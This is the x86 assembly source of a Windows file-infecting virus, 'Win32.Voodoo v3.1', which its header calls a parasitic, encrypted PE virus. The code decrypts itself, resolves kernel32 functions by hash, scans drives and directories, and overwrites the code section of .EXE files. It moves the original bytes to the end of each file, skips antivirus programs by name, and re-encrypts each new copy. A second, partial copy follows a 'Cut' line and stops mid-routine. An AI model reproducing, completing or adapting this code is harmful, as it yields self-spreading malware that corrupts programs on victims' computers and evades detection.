; ============================ Win32.Voodoo_v3.1 ===========================
; Program : Voodoo v3.1
; Description : Parasitic,crypt PE virus
; Last modified : 01.09.1999
; Purpose : process handling under win32
; Target OS : Win95/98/NT
; Notes :
ImBase equ 00400000h
Entyp equ 00001000h
ADDC equ ImBase+Entyp+5
DiskCount EqU 4
FileCount EqU 1
SYSTEM32CRC EQU 04C6D9398h
.386p
.model flat
VirSize EQU offset Voodoo_Ver_3_0E - offset Voodoo_Ver_3_1
MemSize Equ 2300h
extrn ExitProcess:PROC
include win32con.inc ; ㄡ牠ē consts
.DATA
db 0
flag dd 12345678h
CheckSum EQU 0B0966F54h
CheckSum2 EQU 05E5F512Fh
GlobalAllocCRC EQU 01D2925FEh
GlobalLockCRC EQU 0BABEC79Dh
GlobalUnlockCRC EQU 09EA2AB80h
GlobalFreeCRC EQU 0B3BDC497h
CreateFileACRC EQU 0FE222F03h
CreateFileMappingACRC EQU 0CCF0FBCBh
MapViewOfFileCRC EQU 0D3DED3B4h
UnmapViewOfFileCRC EQU 0A5ADAF97h
FlushViewOfFileCRC EQU 0AFBFBF98h
ReadFileCRC EQU 0E5E1DAC2h
CloseHandleCRC EQU 02731310Dh
FindFirstFileACRC EQU 0315E6238h
FindNextFileACRC EQU 0C7F4F8CFh
SetFileAttributesACRC EQU 0EE2112FBh
SetFileTimeCRC EQU 012211900h
GetFileSizeCRC EQU 01E2D17F3h
GetCommandLineACRC EQU 08CBFBF94h
lstrcpyACRC EQU 001342E28h
SetFilePointerCRC EQU 065676742h
GetCurrentDirectoryCRC EQU 0E012FECDh
SetCurrentDirectoryCRC EQU 0E012FED9h
GetSystemTimeCRC EQU 018271EF9h
_GlobalUnlock EQU 0
_GlobalFree EQU _GlobalUnlock+4
_CreateFileA EQU _GlobalFree+4
_CreateFileMappingA EQU _CreateFileA+4
_MapViewOfFile EQU _CreateFileMappingA+4
_UnmapViewOfFile EQU _MapViewOfFile+4
_FlushViewOfFile EQU _UnmapViewOfFile+4
_CloseHandle EQU _FlushViewOfFile+4
_FindFirstFileA EQU _CloseHandle+4
_FindNextFileA EQU _FindFirstFileA+4
_SetFileAttributesA EQU _FindNextFileA+4
_SetFileTime EQU _SetFileAttributesA+4
_GetFileSize EQU _SetFileTime+4
_GetCommandLineA EQU _GetFileSize+4
_ReadFile EQU _GetCommandLineA+4
_lstrcpyA EQU _ReadFile+4
_SetFilePointer EQU _lstrcpyA+4
_GetCurrentDirectory EQU _SetFilePointer+4
_SetCurrentDirectory EQU _GetCurrentDirectory+4
_GetSystemTime EQU _SetCurrentDirectory+4
OldEBP EQU _GetSystemTime+4
FileSize EQU OldEBP+4
HhendleOfFile EQU FileSize+4
HhendleOfMapFile EQU HhendleOfFile+4
Pointer2MapFile EQU HhendleOfMapFile+4
tag EQU Pointer2MapFile+4
SearcHandle EQU tag+2
SearcHandle2 EQU SearcHandle+4
systemtime EQU SearcHandle2+4
CODEBUF EQU systemtime +16
CommandLine EQU CODEBUF+VirSize
CurDir EQU CommandLine+800
CurDir2 EQU CurDir+800
Win32FindData EQU CurDir2 +800
CreationTime EQU Win32FindData+4
LastAccessTime EQU CreationTime+4
LastWriteTime EQU LastAccessTime+4
files EQU LastWriteTime+32
NumberOfBytesRead EQU MemSize-4
.CODE
@Name_Pointers_RVA EQU offset Name_Pointers_RVA - offset EntryPoint_
@GetProcAddress EQU offset GetProcAddress - offset EntryPoint_
@KernelHandle EQU offset KernelHandle - offset EntryPoint_
@_GlobalAlloc EQU offset _GlobalAlloc - offset EntryPoint_
@_GlobalLock EQU offset _GlobalLock - offset EntryPoint_
@MemPointer EQU offset MemPointer - offset EntryPoint_
@NextCode EQU offset NextCode - offset EntryPoint_
@Dirmask EQU offset Dirmask - offset EntryPoint_
@mask EQU offset mask - offset EntryPoint_
@disk EQU offset disk - offset EntryPoint_
@EntryPointRVA EQU offset EntryPointRVA - offset EntryPoint_
@ImportTable EQU offset ImportTable - offset EntryPoint_
@EndImportTable EQU offset EndImportTable - offset EntryPoint_
Voodoo_Ver_3_1:
Call EntryPoint_
EntryPoint_:
;find MZ in memory
;----------------------
popravka EQU offset CryptBegin - offset Voodoo_Ver_3_1
INCAX EQU offset @INCAX - offset Voodoo_Ver_3_1
CRCcode EQU offset @CRCcode - offset Voodoo_Ver_3_1
mov al,00
call _k
_k:pop esi
mov ecx,VirSize - popravka
add esi,offset CryptBegin- offset _k ;10h+18+6
mov ebp,esp
crypt: xor byte ptr [esi],al
mov dword ptr [ebp+18],12345678h
cmp dword ptr [ebp+18+1],12345678h
jne k
jmp Voodoo_Ver_3_0E
k: inc esi
@INCAX:db 90h, 90h, 90h ;add ax,cx
loop crypt
CryptBegin:
;----------------------
popravka2 EQU offset CryptBegin2 - offset Voodoo_Ver_3_1
INCAX2 EQU offset @INCAX2 - offset Voodoo_Ver_3_1
@CRCcode:
mov al,00
call _k2
_k2:pop esi
mov ecx,VirSize - popravka2
add esi,offset CryptBegin2- offset _k2 ;10h+18+6
mov ebp,esp
crypt2: xor byte ptr [esi],al
mov dword ptr [ebp+18],12345678h
cmp dword ptr [ebp+18+1],12345678h
jne k2
jmp Voodoo_Ver_3_0E
k2: inc esi
@INCAX2:db 90h, 90h, 90h ;add ax,cx
loop crypt2
CryptBegin2:
;----------------------
call _ESI
_ESI: pop esi
pop ecx
call ScanMZ
; in esi PE header
add esi,80h
add edi,dword ptr [esi] ;Import RVA
jmp @L1
NotKERNEL32:
MOV EBX,EBP
add edi,00014h
@L1:
cmp dword ptr [edi+0ch],000000h
je NOtFound
add ebx,dword ptr [edi+0ch] ;RVA NAme of dll
call CRCSum
cmp eax,CheckSum
jne NotKERNEL32
push ebp
pop esi
add ESI,DWORD ptr [edi+10h] ;KERNEL32 proc
mov esi,dword ptr [esi]
cmp byte ptr [esi+5],0e9h ; win98
jne Ok_
add esi,dword ptr [esi+6]
Ok_:call ScanMZ
;push EBP ;Hendle of KERNEL32.dll
add esi,78h
add edi,dword ptr [esi] ; edi=Export Directory Table RVA
mov eax,ebp
add eax,dword ptr [edi+1ch] ; Address Table
push eax
mov edx,ebp
add edx,dword ptr [edi+24h] ; Ordinal Table
add ebx,dword ptr [edi+20h] ;ebx=Name Pointers RVA
mov dword ptr [ecx+@Name_Pointers_RVA],ebx
mov esi,ebx
push ecx
mov ecx,dword ptr [edi+18h] ; Num of Name Pointers
push ecx
@L2:call ScanNameTable
cmp eax,CheckSum2
je FoundGetProcAdr
inc esi
inc esi
inc esi
inc esi
loop @L2
FoundGetProcAdr:
pop eax
sub eax,ecx ; #function
shl eax,1 ; x2
; Ordinal Table
add edx,eax ;
xor eax,eax
mov ax,word ptr [edx] ;Ordinal of GetProcAddress
shl eax,2 ;x4
pop ecx ;entry
pop ebx ; offset to Address Table
add ebx,eax
mov eax,dword ptr [ebx]
add eax,ebp
mov [@GetProcAddress+ecx],eax
mov [@KernelHandle+ecx],ebp
mov edx,GlobalAllocCRC
call CalkProcAdress
mov [@_GlobalAlloc+ecx],eax
mov edx,GlobalLockCRC
call CalkProcAdress
mov [@_GlobalLock+ecx],eax
push ecx
push MemSize
push 0
call dword ptr [@_GlobalAlloc+ecx]
pop ecx
push ecx
push eax
call dword ptr [@_GlobalLock+ecx]
pop ecx
mov [@MemPointer+ecx],eax
mov eBX,eax
mov edi,eax
mov esi,@ImportTable
add esi,ecx
MakeImport:
mov edx,dword ptr [esi]
call CalkProcAdress
cld
stosd
inc esi
inc esi
inc esi
inc esi
cmp word ptr [esi],6666h
jne MakeImport
mov ebp,ecx ; entry !
;--------------------
;####################
call Infect
;####################
mov esi,ebp
sub esi,5
mov edi,CODEBUF
add edi,ebx ;MemPointer
cld
mov ecx,VirSize
rep movsb
NOtFound:
cmp [flag],12345678h
jne Ret2Prog
push 0
call ExitProcess
Ret2Prog: mov [OldEBP+ebx],ebp
mov esi,ebx
mov ebp,esi
add esi,@NextCode+CODEBUF+5
add ebp,CODEBUF+5
jmp esi
NextCode:
call GetCommandLineA
mov esi,eax
cmp byte ptr [esi+1],':' ;for win9x
je NormalCommandLine
inc eax
NormalCommandLine:
push eax
mov eax,CommandLine
add eax,ebx
push eax
call lstrcpyA
mov esi,CommandLine
add esi,ebx
push esi
@L3: inc esi
cmp byte ptr [esi],'.'
jne @L3
mov byte ptr [esi+4],0
pop eax
push NULL
push FILE_ATTRIBUTE_ARCHIVE
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ ;or FILE_SHARE_WRITE
push GENERIC_READ ;or GENERIC_WRITE
push eax
call CreateFileA
mov [HhendleOfFile+ebx],eax
push eax
push NULL
push eax
call GetFileSize
mov edx,eax
sub edx,VirSize
pop eax
push eax
push 0
push NULL
push edx
push eax
call SetFilePointer
pop eax
mov edx,[ebx+OldEBP]
sub edx,5
push edx
push NULL
mov ecx,NumberOfBytesRead
add ecx,ebx
push ecx
push VirSize
push edx
push eax
call ReadFile
pop esi
call _EDI
EntryPointRVA: dd 0
_EDI: pop edi
add esi,dword ptr [edi]
jmp esi
;----------------------------------------------------------
PushWin32FindData:
mov edx,Win32FindData
add edx,ebx
ret
InfectDir:
mov eax,CurDir2
add eax,ebx
push eax ;
push 800
call GetCurrentDirectory
call Infect_All_files
call PushWin32FindData
push edx
mov eax,ebp
add eax,@Dirmask
push eax
call FindFirstFileA
mov dword ptr [SearcHandle+ebx],eax
l2: call PushWin32FindData
push edx
push dword ptr [SearcHandle+ebx]
call FindNextFileA
or eax,eax
jz ExitFromProcInfectDir
cmp byte ptr [files+ebx],'.'
je l2
mov eax,[Win32FindData+ebx]
and eax,FILE_ATTRIBUTE_DIRECTORY
jz l2
;set new dir
mov edx,CurDir2
add edx,ebx
push edx
call SetCurrentDirectory
mov edx,files
add edx,ebx
; SYSTEM32 ?
push ebx
mov ebx,edx
call CRCSum
pop ebx
cmp eax,SYSTEM32CRC
je l2 ;DoNotInfect
push edx
call SetCurrentDirectory
call Infect_All_files
jmp l2
ExitFromProcInfectDir:
ret
;----------------------------------------------------------
Infect_All_files:
call PushWin32FindData
push edx
mov edx,@mask
add edx,ebp
push edx
xor ecx,ecx
call FindFirstFileA
mov dword ptr [SearcHandle2+ebx],eax
cmp eax,-1
je l2__
Next: or eax,eax
jz l2__
cmp ecx,FileCount
jge l2__
inc ecx
push ecx
call InfectFile
call PushWin32FindData
push edx
push dword ptr [SearcHandle2+ebx]
call FindNextFileA
pop ecx
cmp di,9999h
jne Noerrror
dec ecx
xor edi,edi
Noerrror:
jmp Next
l2__: ret
;-----------------------------------------------------------
Infect:
mov eax,CurDir
add eax,ebx
push eax ;
push 800
call GetCurrentDirectory
call InfectDir
mov ecx,DiskCount
Scan: push ecx
mov eax,@disk
add eax,ebp
push eax
call SetCurrentDirectory
call InfectDir
inc byte ptr [@disk+ebp]
pop ecx
loop Scan
mov eax,CurDir
add eax,ebx
push eax ;
call SetCurrentDirectory
ret
;----------------------------------------------------------
InfectFile:
mov eax,ebx
add eax,files
cmp word ptr [eax],'-F' ;F-port
je @AV
cmp word ptr [eax],'WA' ; AW ?
je @AV
cmp word ptr [eax],'VA' ; AV?????
je @AV
cmp word ptr [eax+1],'VA' ;NAV,PAV,RAV,_AVP???
je @AV
cmp word ptr [eax+3],'BE' ;drWeb
je @AV
cmp word ptr [eax+2],'DN' ;PANDA
je @AV
cmp dword ptr [eax],'ITNA';ANTI???
je @AV
cmp dword ptr [eax],'FASV';VSAF???
je @AV
cmp dword ptr [eax],'PWSV';VSWP???
je @AV
cmp dword ptr [eax],'VASF';FSAV???
je @AV
push eax
push 00000020h
push eax
call SetFileAttributesA
pop eax
push NULL
push FILE_ATTRIBUTE_ARCHIVE
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
push eax
call CreateFileA
cmp eax,-1
je Error__
call LoadMemPointer
mov [HhendleOfFile+ebx],eax
push ebx
push NULL
push eax
call GetFileSize
pop ebx
mov [FileSize+ebx],eax
Point@ret:push edx
push eax ; to MApViewofFile
push NULL
push eax
push NULL
push PAGE_READWRITE
push NULL
push dword ptr [HhendleOfFile+ebx]
call CreateFileMappingA
mov [HhendleOfMapFile+ebx],eax
; v steke Size
push 0
push 0
push FILE_MAP_WRITE
push eax
call MapViewOfFile
mov [Pointer2MapFile+ebx],eax
pop edx
cmp word ptr [tag+ebx],6666h
je OkOb
mov esi,eax
CMP byte ptr [esi+18h],40h
jl OOO
cmp dword ptr [esi+3ch],00010000h
jg OOO
mov edi,dword ptr [esi+3ch]
cmp dword ptr [esi+edi],00004550h ;PE Only !
jne OOO
cmp dword ptr [esi+6fh],334e4957h ;'WIN3' Infected ?
je OOO
;find CODE object
mov [systemtime+ebx],esi
;
add esi,edi
mov eax,dword ptr [esi+80h] ;Import Table RVA
push eax
xor ecx,ecx
mov cx,word ptr [esi+6h] ;Num of Object
MOV EDX,DWORD ptr [esi+28h] ; Entry point RVA
mov dword ptr [ebp+@EntryPointRVA],edx
mov edx,esi
mov eax,24
add ax,word ptr [esi+14h]
mov edi,esi
add edi,eax ;edi=Object Table
pop eax ;Import Table RVA
pusha
mov edx,eax
Find_Import_Table:
dec ecx
mov eax,dword ptr [edi+0ch] ; Object RVA
cmp edx,eax
jge Mabe
IncEDI: add edi,28h
or ecx,ecx
je Not_Find
jmp Find_Import_Table
Mabe: add eax,dword ptr [edi+10h] ; SIZE
CMP EDX,EAX ; Object RVA =< Import Table RVA =< Object RVA + Phisikal Size
jle L22
jmp IncEDI
L22:
mov esi,[Pointer2MapFile+ebx]
push edx
sub edx,dword ptr [edi+0ch]
add esi,edx
mov eax,dword ptr [edi+14h] ;Phis offset
add esi,eax
pop edx ; ESI = Phis offset Import Table
mov ecx,dword ptr [edi+0ch] ; Object RVA
ECTLI_KERNEL:
mov edi,dword ptr [esi+0ch] ; EDI=Name RVA
cmp edi,NULL ;
je KERNEL_HET
sub edi,ecx
add edi,eax ; EAX= Phis offset
add edi,[Pointer2MapFile+ebx]
cmp dword ptr [edi],'NREK';KERNEL
je KERNEL_ECT
add esi,14h
jmp ECTLI_KERNEL
KERNEL_HET:
Not_Find: popa
jmp Code_Not_Find
KERNEL_ECT: popa
_loop: db 08Bh,47h,24h ;mov eax,dword [edi+024h]
EXEC_FLAG EQU 20000020h
and eax,EXEC_FLAG
jnz Code_Object
add edi,2ch
loop _loop
jmp Code_Not_Find
Code_Object:
;chek object size
cmp dword ptr [edi+10h],VirSize
jl Code_Not_Find
push esi
mov esi,dword ptr [systemtime+ebx]
mov dword ptr [esi+6fh],334e4957h
pop esi
; make writeble
or dword ptr [edi+24h],80000000h
mov eax,dword ptr [edi+0ch] ;object RVA
sub dword ptr [ebp+@EntryPointRVA],eax
mov dword ptr [edx+28h],eax ; Set New Entry Point RVA
; save old Programm
call CloseMapping
mov word ptr [ebx+tag],06666h
mov eax,dword ptr [ebx+FileSize]
push eax
add eax,VirSize
jmp Point@ret
OkOb: mov word ptr [ebx+tag],09999h
mov esi,dword ptr [edi+14h] ;phisical offset
add esi,dword ptr [ebx+Pointer2MapFile]
;add esi,edx
pop edi
add edi,dword ptr [ebx+Pointer2MapFile]
mov ecx,VirSize
push esi ;CODE
push esi
cld
rep movsb
;write bady to program
mov esi,ebp
sub esi,5
pop edi ; CODE
mov ecx,VirSize
cld
rep movsb
mov eax,ebx
add eax,systemtime
push eax
call GetSystemTime
mov ax,word ptr [ebx+systemtime+14]
pop esi
mov byte ptr [esi+6],al
mov byte ptr [esi+CRCcode+1],al ; ?
mov dword ptr [esi+INCAX],0e2c10366h ;inc ax
mov dword ptr [esi+INCAX2],0e2c10366h ;inc ax
push esi
push eax
mov ecx,VirSize- popravka2
add esi,offset CryptBegin2- offset Voodoo_Ver_3_1;
crypt_2: xor byte ptr [esi],al
add ax,cx
inc esi
loop crypt_2
pop eax
POP esi
mov ecx,VirSize- popravka
add esi,offset CryptBegin- offset Voodoo_Ver_3_1;2eh+6
crypt_: xor byte ptr [esi],al
add ax,cx
inc esi
loop crypt_
Code_Not_Find:
OOO2: call CloseMapping
Error__2: call PushWin32FindData
push dword ptr [edx]
mov eax,ebx
add eax,files
push eax
call SetFileAttributesA
@AV: ret
OOO: mov di,9999h
jmp OOO2
Error__: mov di,9999h
jmp Error__2
;--------------------------------------------------------
CalkProcAdress: push ecx
push esi
push edi
mov esi,@Name_Pointers_RVA
add esi,ecx
mov esi,dword ptr [esi]
fCRC: call ScanNameTable
cmp eax,edx
je foCRC
inc esi
inc esi
inc esi
inc esi
jmp fCRC
foCRC:
mov eax,dword ptr [esi]
add eax,ebp
push eax
mov eax,@KernelHandle
add eax,ecx
push dword ptr [eax]
call dword ptr [@GetProcAddress+ecx]
pop edi
pop esi
pop ecx
ret
;--------------------------------------------------------
ScanNameTable:
PUSH EBX
push ecx
mov ebx,ebp
add ebx,dword ptr [esi]
call CRCSum
pop ecx
POP EBX
ret
;--------------------------------------------------------
CRCSum: xor eax,eax
Sum: add eax,dword ptr [ebx]
cmp byte ptr [ebx+4],0
je ExitfromCRCSum
inc ebx
jmp Sum
ExitfromCRCSum:
ret
;--------------------------------------------------------
ScanMZ:
push ecx ; //
and si,1111000000000000b
ScanMZ_:
sub esi,1000h
cmp word ptr [esi],'ZM'
jne ScanMZ_
mov edi,esi
mov ebx,esi
MOV EBP,ESI
push esi
cmp dword ptr [esi+3ch],00010000h
jg NextMZ
add esi,dword ptr [esi+3ch]
cmp dword ptr [esi],004550h
NextMZ:pop esi
jne ScanMZ_
add esi,dword ptr [esi+3ch]
pop ecx
ret
;---Local ----------
CloseMapping:
push edx
push dword ptr [Pointer2MapFile+ebx]
call UnmapViewOfFile
push dword ptr [HhendleOfMapFile+ebx]
call CloseHandle
pop edx
ret
;--------------------------------------------------------
LoadMemPointer:
mov ebx,dword ptr ds:[ebp+@MemPointer]
ret
;----Import---------
GetFileSize: call LoadMemPointer
jmp dword ptr ds:[ebx+_GetFileSize]
CreateFileA: call LoadMemPointer
jmp dword ptr ds:[ebx+_CreateFileA]
CreateFileMappingA:
call LoadMemPointer
jmp dword ptr ds:[ebx+_CreateFileMappingA]
MapViewOfFile:
call LoadMemPointer
jmp dword ptr ds:[ebx+_MapViewOfFile]
UnmapViewOfFile:
call LoadMemPointer
jmp dword ptr ds:[ebx+_UnmapViewOfFile]
FlushViewOfFile:
call LoadMemPointer
jmp dword ptr ds:[ebx+_FlushViewOfFile]
CloseHandle: call LoadMemPointer
jmp dword ptr ds:[ebx+_CloseHandle]
GetCommandLineA:
call LoadMemPointer
jmp dword ptr ds:[ebx+_GetCommandLineA]
lstrcpyA: call LoadMemPointer
jmp dword ptr ds:[ebx+_lstrcpyA]
ReadFile: call LoadMemPointer
jmp dword ptr ds:[ebx+_ReadFile]
SetFilePointer: call LoadMemPointer
jmp dword ptr ds:[ebx+_SetFilePointer]
FindFirstFileA: call LoadMemPointer
jmp dword ptr ds:[ebx+_FindFirstFileA]
FindNextFileA: call LoadMemPointer
jmp dword ptr ds:[ebx+_FindNextFileA]
GetCurrentDirectory:
call LoadMemPointer
jmp dword ptr ds:[ebx+_GetCurrentDirectory]
SetCurrentDirectory:
call LoadMemPointer
jmp dword ptr ds:[ebx+_SetCurrentDirectory]
SetFileAttributesA:
call LoadMemPointer
jmp dword ptr ds:[ebx+_SetFileAttributesA]
SetFileTime:
call LoadMemPointer
jmp dword ptr ds:[ebx+_SetFileTime]
GetSystemTime:
call LoadMemPointer
jmp dword ptr ds:[ebx+_GetSystemTime]
db '(c) Voodoo/SMF v3.1 07.08.1999'
;-------------------
GetProcAddress dd 11223344h
KernelHandle dd 11223344h
Name_Pointers_RVA dd 11223344h
_GlobalAlloc dd 11223344h
_GlobalLock dd 11223344h
MemPointer dd 11223344h
disk db 'c:/',0
Dirmask DB '*.*',0
mask DB '*.EXE',0
ImportCount EQU (offset EndImportTable- offset ImportTable)/4
ImportTable: dd GlobalUnlockCRC
dd GlobalFreeCRC
dd CreateFileACRC
dd CreateFileMappingACRC
dd MapViewOfFileCRC
dd UnmapViewOfFileCRC
dd FlushViewOfFileCRC
dd CloseHandleCRC
dd FindFirstFileACRC
dd FindNextFileACRC
dd SetFileAttributesACRC
dd SetFileTimeCRC
dd GetFileSizeCRC
dd GetCommandLineACRC
dd ReadFileCRC
dd lstrcpyACRC
dd SetFilePointerCRC
dd GetCurrentDirectoryCRC
dd SetCurrentDirectoryCRC
dd GetSystemTimeCRC
dw 6666h
EndImportTable:
Voodoo_Ver_3_0E:
Ends
End Voodoo_Ver_3_1
===== Cut =====
; Program : Voodoo v3.1
; Description : Parasitic,crypt PE virus
; Last modified : 01.09.1999
; Purpose : process handling under win32
; Target OS : Win95/98/NT
; Notes :
ImBase equ 00400000h
Entyp equ 00001000h
ADDC equ ImBase+Entyp+5
DiskCount EqU 4
FileCount EqU 1
SYSTEM32CRC EQU 04C6D9398h
.386p
.model flat
VirSize EQU offset Voodoo_Ver_3_0E - offset Voodoo_Ver_3_1
MemSize Equ 2300h
extrn ExitProcess:PROC
include win32con.inc ; ㄡ牠ē consts
.DATA
db 0
flag dd 12345678h
CheckSum EQU 0B0966F54h
CheckSum2 EQU 05E5F512Fh
GlobalAllocCRC EQU 01D2925FEh
GlobalLockCRC EQU 0BABEC79Dh
GlobalUnlockCRC EQU 09EA2AB80h
GlobalFreeCRC EQU 0B3BDC497h
CreateFileACRC EQU 0FE222F03h
CreateFileMappingACRC EQU 0CCF0FBCBh
MapViewOfFileCRC EQU 0D3DED3B4h
UnmapViewOfFileCRC EQU 0A5ADAF97h
FlushViewOfFileCRC EQU 0AFBFBF98h
ReadFileCRC EQU 0E5E1DAC2h
CloseHandleCRC EQU 02731310Dh
FindFirstFileACRC EQU 0315E6238h
FindNextFileACRC EQU 0C7F4F8CFh
SetFileAttributesACRC EQU 0EE2112FBh
SetFileTimeCRC EQU 012211900h
GetFileSizeCRC EQU 01E2D17F3h
GetCommandLineACRC EQU 08CBFBF94h
lstrcpyACRC EQU 001342E28h
SetFilePointerCRC EQU 065676742h
GetCurrentDirectoryCRC EQU 0E012FECDh
SetCurrentDirectoryCRC EQU 0E012FED9h
GetSystemTimeCRC EQU 018271EF9h
_GlobalUnlock EQU 0
_GlobalFree EQU _GlobalUnlock+4
_CreateFileA EQU _GlobalFree+4
_CreateFileMappingA EQU _CreateFileA+4
_MapViewOfFile EQU _CreateFileMappingA+4
_UnmapViewOfFile EQU _MapViewOfFile+4
_FlushViewOfFile EQU _UnmapViewOfFile+4
_CloseHandle EQU _FlushViewOfFile+4
_FindFirstFileA EQU _CloseHandle+4
_FindNextFileA EQU _FindFirstFileA+4
_SetFileAttributesA EQU _FindNextFileA+4
_SetFileTime EQU _SetFileAttributesA+4
_GetFileSize EQU _SetFileTime+4
_GetCommandLineA EQU _GetFileSize+4
_ReadFile EQU _GetCommandLineA+4
_lstrcpyA EQU _ReadFile+4
_SetFilePointer EQU _lstrcpyA+4
_GetCurrentDirectory EQU _SetFilePointer+4
_SetCurrentDirectory EQU _GetCurrentDirectory+4
_GetSystemTime EQU _SetCurrentDirectory+4
OldEBP EQU _GetSystemTime+4
FileSize EQU OldEBP+4
HhendleOfFile EQU FileSize+4
HhendleOfMapFile EQU HhendleOfFile+4
Pointer2MapFile EQU HhendleOfMapFile+4
tag EQU Pointer2MapFile+4
SearcHandle EQU tag+2
SearcHandle2 EQU SearcHandle+4
systemtime EQU SearcHandle2+4
CODEBUF EQU systemtime +16
CommandLine EQU CODEBUF+VirSize
CurDir EQU CommandLine+800
CurDir2 EQU CurDir+800
Win32FindData EQU CurDir2 +800
CreationTime EQU Win32FindData+4
LastAccessTime EQU CreationTime+4
LastWriteTime EQU LastAccessTime+4
files EQU LastWriteTime+32
NumberOfBytesRead EQU MemSize-4
.CODE
@Name_Pointers_RVA EQU offset Name_Pointers_RVA - offset EntryPoint_
@GetProcAddress EQU offset GetProcAddress - offset EntryPoint_
@KernelHandle EQU offset KernelHandle - offset EntryPoint_
@_GlobalAlloc EQU offset _GlobalAlloc - offset EntryPoint_
@_GlobalLock EQU offset _GlobalLock - offset EntryPoint_
@MemPointer EQU offset MemPointer - offset EntryPoint_
@NextCode EQU offset NextCode - offset EntryPoint_
@Dirmask EQU offset Dirmask - offset EntryPoint_
@mask EQU offset mask - offset EntryPoint_
@disk EQU offset disk - offset EntryPoint_
@EntryPointRVA EQU offset EntryPointRVA - offset EntryPoint_
@ImportTable EQU offset ImportTable - offset EntryPoint_
@EndImportTable EQU offset EndImportTable - offset EntryPoint_
Voodoo_Ver_3_1:
Call EntryPoint_
EntryPoint_:
;find MZ in memory
;----------------------
popravka EQU offset CryptBegin - offset Voodoo_Ver_3_1
INCAX EQU offset @INCAX - offset Voodoo_Ver_3_1
CRCcode EQU offset @CRCcode - offset Voodoo_Ver_3_1
mov al,00
call _k
_k:pop esi
mov ecx,VirSize - popravka
add esi,offset CryptBegin- offset _k ;10h+18+6
mov ebp,esp
crypt: xor byte ptr [esi],al
mov dword ptr [ebp+18],12345678h
cmp dword ptr [ebp+18+1],12345678h
jne k
jmp Voodoo_Ver_3_0E
k: inc esi
@INCAX:db 90h, 90h, 90h ;add ax,cx
loop crypt
CryptBegin:
;----------------------
popravka2 EQU offset CryptBegin2 - offset Voodoo_Ver_3_1
INCAX2 EQU offset @INCAX2 - offset Voodoo_Ver_3_1
@CRCcode:
mov al,00
call _k2
_k2:pop esi
mov ecx,VirSize - popravka2
add esi,offset CryptBegin2- offset _k2 ;10h+18+6
mov ebp,esp
crypt2: xor byte ptr [esi],al
mov dword ptr [ebp+18],12345678h
cmp dword ptr [ebp+18+1],12345678h
jne k2
jmp Voodoo_Ver_3_0E
k2: inc esi
@INCAX2:db 90h, 90h, 90h ;add ax,cx
loop crypt2
CryptBegin2:
;----------------------
call _ESI
_ESI: pop esi
pop ecx
call ScanMZ
; in esi PE header
add esi,80h
add edi,dword ptr [esi] ;Import RVA
jmp @L1
NotKERNEL32:
MOV EBX,EBP
add edi,00014h
@L1:
cmp dword ptr [edi+0ch],000000h
je NOtFound
add ebx,dword ptr [edi+0ch] ;RVA NAme of dll
call CRCSum
cmp eax,CheckSum
jne NotKERNEL32
push ebp
pop esi
add ESI,DWORD ptr [edi+10h] ;KERNEL32 proc
mov esi,dword ptr [esi]
cmp byte ptr [esi+5],0e9h ; win98
jne Ok_
add esi,dword ptr [esi+6]
Ok_:call ScanMZ
;push EBP ;Hendle of KERNEL32.dll
add esi,78h
add edi,dword ptr [esi] ; edi=Export Directory Table RVA
mov eax,ebp
add eax,dword ptr [edi+1ch] ; Address Table
push eax
mov edx,ebp
add edx,dword ptr [edi+24h] ; Ordinal Table
add ebx,dword ptr [edi+20h] ;ebx=Name Pointers RVA
mov dword ptr [ecx+@Name_Pointers_RVA],ebx
mov esi,ebx
push ecx
mov ecx,dword ptr [edi+18h] ; Num of Name Pointers
push ecx
@L2:call ScanNameTable
cmp eax,CheckSum2
je FoundGetProcAdr
inc esi
inc esi
inc esi
inc esi
loop @L2
FoundGetProcAdr:
pop eax
sub eax,ecx ; #function
shl eax,1 ; x2
; Ordinal Table
add edx,eax ;
xor eax,eax
mov ax,word ptr [edx] ;Ordinal of GetProcAddress
shl eax,2 ;x4
pop ecx ;entry
pop ebx ; offset to Address Table
add ebx,eax
mov eax,dword ptr [ebx]
add eax,ebp
mov [@GetProcAddress+ecx],eax
mov [@KernelHandle+ecx],ebp
mov edx,GlobalAllocCRC
call CalkProcAdress
mov [@_GlobalAlloc+ecx],eax
mov edx,GlobalLockCRC
call CalkProcAdress
mov [@_GlobalLock+ecx],eax
push ecx
push MemSize
push 0
call dword ptr [@_GlobalAlloc+ecx]
pop ecx
push ecx
push eax
call dword ptr [@_GlobalLock+ecx]
pop ecx
mov [@MemPointer+ecx],eax
mov eBX,eax
mov edi,eax
mov esi,@ImportTable
add esi,ecx
MakeImport:
mov edx,dword ptr [esi]
call CalkProcAdress
cld
stosd
inc esi
inc esi
inc esi
inc esi
cmp word ptr [esi],6666h
jne MakeImport
mov ebp,ecx ; entry !
;--------------------
;####################
call Infect
;####################
mov esi,ebp
sub esi,5
mov edi,CODEBUF
add edi,ebx ;MemPointer
cld
mov ecx,VirSize
rep movsb
NOtFound:
cmp [flag],12345678h
jne Ret2Prog
push 0
call ExitProcess
Ret2Prog: mov [OldEBP+ebx],ebp
mov esi,ebx
mov ebp,esi
add esi,@NextCode+CODEBUF+5
add ebp,CODEBUF+5
jmp esi
NextCode:
call GetCommandLineA
mov esi,eax
cmp byte ptr [esi+1],':' ;for win9x
je NormalCommandLine
inc eax
NormalCommandLine:
push eax
mov eax,CommandLine
add eax,ebx
push eax
call lstrcpyA
mov esi,CommandLine
add esi,ebx
push esi
@L3: inc esi
cmp byte ptr [esi],'.'
jne @L3
mov byte ptr [esi+4],0
pop eax
push NULL
push FILE_ATTRIBUTE_ARCHIVE
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ ;or FILE_SHARE_WRITE
push GENERIC_READ ;or GENERIC_WRITE
push eax
call CreateFileA
mov [HhendleOfFile+ebx],eax
push eax
push NULL
push eax
call GetFileSize
mov edx,eax
sub edx,VirSize
pop eax
push eax
push 0
push NULL
push edx
push eax
call SetFilePointer
pop eax
mov edx,[ebx+OldEBP]
sub edx,5
push edx
push NULL
mov ecx,NumberOfBytesRead
add ecx,ebx
push ecx
push VirSize
push edx
push eax
call ReadFile
pop esi
call _EDI
EntryPointRVA: dd 0
_EDI: pop edi
add esi,dword ptr [edi]
jmp esi
;----------------------------------------------------------
PushWin32FindData:
mov edx,Win32FindData
add edx,ebx
ret
InfectDir:
mov eax,CurDir2
add eax,ebx
push eax ;
push 800
call GetCurrentDirectory
call Infect_All_files
call PushWin32FindData
push edx
mov eax,ebp
add eax,@Dirmask
push eax
